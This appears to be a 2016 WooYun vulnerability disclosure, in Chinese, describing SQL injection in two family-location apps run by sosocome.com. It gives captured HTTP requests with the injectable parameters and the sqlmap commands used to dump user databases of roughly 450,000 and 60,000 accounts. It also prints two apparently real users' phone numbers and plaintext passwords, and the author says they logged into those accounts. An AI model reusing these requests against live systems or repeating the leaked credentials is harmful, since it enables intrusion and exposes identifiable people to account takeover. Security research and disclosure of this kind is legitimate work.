当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186594

漏洞标题:云上家人安心定位两个app注入漏洞(用户数据50w+)

相关厂商:云上家人安心定位

漏洞作者: Zhishufu

提交时间:2016-03-19 19:33

修复时间:2016-05-03 19:33

公开时间:2016-05-03 19:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

云上家人安心定位旗下两个app注入漏洞,一个app的数据45w多,另外一个6w手机号的样子...

详细说明:

http://drops.wooyun.org/tips/749


最近在乌云知识库看到的文章,打算看看手机APP漏洞咋挖,于是就拿起手机...
云上家人安心定位两个APP,以前用过的软件...
官网

http://www.sosocome.com/

0.png


第一步当然是在官网下载两个APP到手机上,然后安装...

下载地址1:http://www.pgyer.com/uMWn
下载地址2:http://www.pgyer.com/ZAjT


手机端设置好代理,然后用burp抓包。

0.01.jpg

0.02.jpg

0.03.jpg


抓包数据分别为
1.

GET /jsp/userIsExist.jsp?phoneNum=12345678901 HTTP/1.1
Host: www.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: BAEID=CC10289F2982ECB4CAA984550AF8933F:FG=1; JSESSIONID=65DE9EA6F7C57F1F23E62543F9D9A809
Cookie2: $Version=1


2.

POST /jsp/ios/login.jsp HTTP/1.1
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Host: w.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Expect: 100-continue
Cookie: BAEID=104726C904CF56BDEF4A7E7C45287724:FG=1; JSESSIONID=F21C0C1644BF8214C903D9BD7535F351
Cookie2: $Version=1
UUID=1&password=2


分别保存为.txt文件然后带到sqlmap里面去跑..

sqlmap.py -r 6.txt --dbs
sqlmap.py -r 7.txt --dbs


两个注入方式分别为GET、POST
注入的结果如下:

5.png

6.png


7.png

8.png


一个有6w多手机号码,另一个有45w多手机号码,还有明文的密码。因为是定位软件,所以账号上涉及用户的手机号,email,家庭住址等等..
找几个账号用手机登陆下

账号1:13752270168 悦悦
密码1:031210
账号2:15832821931 孤狼B组
密码2:15930382462


另外一个6w多手机号

11.png


具体结果看漏洞证明。

漏洞证明:

1.

GET /jsp/userIsExist.jsp?phoneNum=12345678901 HTTP/1.1
Host: www.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: BAEID=CC10289F2982ECB4CAA984550AF8933F:FG=1; JSESSIONID=65DE9EA6F7C57F1F23E62543F9D9A809
Cookie2: $Version=1


2.

POST /jsp/ios/login.jsp HTTP/1.1
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Host: w.sosocome.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0(Linux;U;Android 2.2.1;en-us;Nexus One Build.FRG83) AppleWebKit/553.1(KHTML,like Gecko) Version/4.0 Mobile Safari/533.1
Expect: 100-continue
Cookie: BAEID=104726C904CF56BDEF4A7E7C45287724:FG=1; JSESSIONID=F21C0C1644BF8214C903D9BD7535F351
Cookie2: $Version=1
UUID=1&password=2


6.png

5.png

7.png

8.png

9.png

10.png

11.png

12.png

修复方案:

1.过滤
2.完善用户体系

版权声明:转载请注明来源 Zhishufu@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价

  1. 2016-03-20 20:23 | Zhishufu ( 普通白帽子 | Rank:128 漏洞数:43 | 束缚!)

    估计又是忽略了..